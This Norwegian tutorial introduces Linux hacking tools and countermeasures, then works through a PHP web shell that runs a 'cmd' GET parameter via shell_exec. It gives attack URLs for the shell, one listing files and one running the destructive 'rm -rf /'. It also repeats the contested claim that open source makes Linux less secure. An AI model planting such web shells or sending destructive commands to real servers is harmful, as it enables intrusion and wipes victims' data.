Hacking Linux OS: Hacking med Ubuntu (Kommandoopplæring)

Linux er det mest brukte serveroperativsystemet, spesielt for webservere. Det er åpen kildekode; dette betyr at alle kan ha tilgang til kildekoden. Dette gjør det mindre sikkert sammenlignet med andre operativsystemer ettersom angripere kan studere kildekoden for å finne sårbarheter. Linux for Hackers handler om å utnytte disse sårbarhetene for å få uautorisert tilgang til et system.

I denne artikkelen vil vi introdusere deg til hva Linux er, dets sikkerhetssårbarheter, hacking med Ubuntu og mottiltakene du kan sette i verk.

Rask notat om Linux

Linux er et operativsystem med åpen kildekode. Det er mange distribusjoner av Linux-baserte operativsystemer som Redhat, Fedora og Ubuntu, osv. I motsetning til andre operativsystemer er Linux mindre sikkert når det kommer til sikkerhet. Dette er fordi kildekoden er fritt tilgjengelig, så det er enkelt å studere den for sårbarheter og utnytte dem sammenlignet med andre operativsystemer som ikke er åpen kildekode. Linux kan brukes som et server-, skrivebords-, nettbrett- eller mobiloperativsystem.

Linux-programmer kan betjenes ved hjelp av enten GUI eller kommandoer. Linux-kommandoene for Kali Linux hacking er mer effektive og effektive sammenlignet med bruk av GUI. Av denne grunn hjelper det å kjenne grunnleggende Linux-kommandoer for hacking.

Se disse veiledningene https://www.guru99.com/unix-linux-tutorial.html om hvordan komme i gang med Kali Linux hacks.

Linux Hacking Tools

  • Nessus– dette verktøyet kan brukes til Ubuntu hack, skannekonfigurasjonsinnstillinger, patcher og nettverk etc. finner du på https://www.tenable.com/products/nessus
  • NMap. Dette verktøyet kan brukes til å overvåke verter som kjører på serveren og tjenestene de bruker. Den kan også brukes til å skanne etter porter. Den finner du på https://nmap.org/
  • SARA – SARA er forkortelsen for Security Auditor's Research Assistant. Som navnet tilsier kan dette verktøyet brukes til å revidere nettverk mot trusler som f.eks SQL Injection, XSS etc. finner du på http://www-arc.com/sara/sara.html

Listen ovenfor er ikke uttømmende; det gir deg en ide om verktøyene som er tilgjengelige for Ubuntu hacking og hacking av Linux-systemer.

Hvordan forhindre Linux-hack

Linux Hacking utnytter sårbarhetene i operativsystemet. En organisasjon kan vedta følgende retningslinjer for å beskytte seg mot slike angrep.

  • Patchhåndtering– patcher fikser feil som angripere utnytter for å kompromittere et system. En god oppdateringspolicy vil sikre at du hele tiden bruker relevante oppdateringer på systemet ditt.
  • Riktig OS-konfigurasjon– andre utnyttelser utnytter svakhetene i konfigurasjonen av serveren. Inaktive brukernavn og demoner bør deaktiveres. Standardinnstillinger som vanlige passord til applikasjoner, standard brukernavn og noen portnumre bør endres.
  • Inntrengingsdeteksjonssystem– slike verktøy kan brukes til å oppdage uautorisert tilgang til systemet. Noen verktøy har muligheten til å oppdage og forhindre slike angrep.

Hacking-aktivitet: Hack a Ubuntu Linux-system som bruker PHP

I dette praktiske scenariet vil vi lære å hacke med Ubuntu og vi vil gi deg grunnleggende informasjon om hvordan du kan bruke PHP å kompromittere en Linux. Vi kommer ikke til å målrette noe offer. Hvis du vil prøve det, kan du installere LAMPP på din lokale maskin.

PHP kommer med to funksjoner som kan brukes til å utføre Linux-hacking-kommandoer. Den har exec() og shell_exec() funksjoner. Funksjonen exec() returnerer den siste linjen i kommandoutgangen mens shell_exec() returnerer hele resultatet av kommandoen som en streng.

For demonstrasjonsformål, la oss anta at angriperlederne laster opp følgende fil til en webserver.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HER,

Skriptet ovenfor henter kommandoen fra GET-variabelen kalt cmd. Kommandoen utføres ved hjelp av shell_exec() og resultatene returneres i nettleseren.

Koden ovenfor kan utnyttes ved hjelp av følgende URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HER,

  • “…konsole.php?cmd=ls%20-l”tildeler verdien ls –l til variabelen cmd.

Kommandoen i Ubuntu for hacking mot serveren vil bli utført som

shell_exec('ls -l') ;

Å kjøre koden ovenfor på en webserver gir resultater som ligner på følgende.

Hack a Ubuntu Linux-system som bruker PHP

Kommandoen ovenfor viser ganske enkelt filene i gjeldende katalog og tillatelsene

La oss anta at angriperen sender følgende kommando

rm -rf /

HER,

  • "rm" fjerner filene
  • "rf" gjør at rm-kommandoen kjøres i en rekursiv modus. Sletter alle mapper og filer
  • "/" instruerer kommandoen om å begynne å slette filer fra rotkatalogen

Angrepet URL ville sett omtrent slik ut

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Sammendrag

  • Linux er et populært operativsystem for servere, stasjonære datamaskiner, nettbrett og mobile enheter.
  • Linux er åpen kildekode, og kildekoden kan fås av alle. Dette gjør det enkelt å oppdage sårbarhetene. Det er et av de beste operativsystemene for hackere.
  • Grunnleggende og nettverkshacking-kommandoer i Ubuntu er verdifulle for Linux-hackere.
  • Sårbarheter er en svakhet som kan utnyttes til å kompromittere et system.
  • En god sikkerhet kan bidra til å beskytte et system mot å bli kompromittert av en angriper.

Oppsummer dette innlegget med: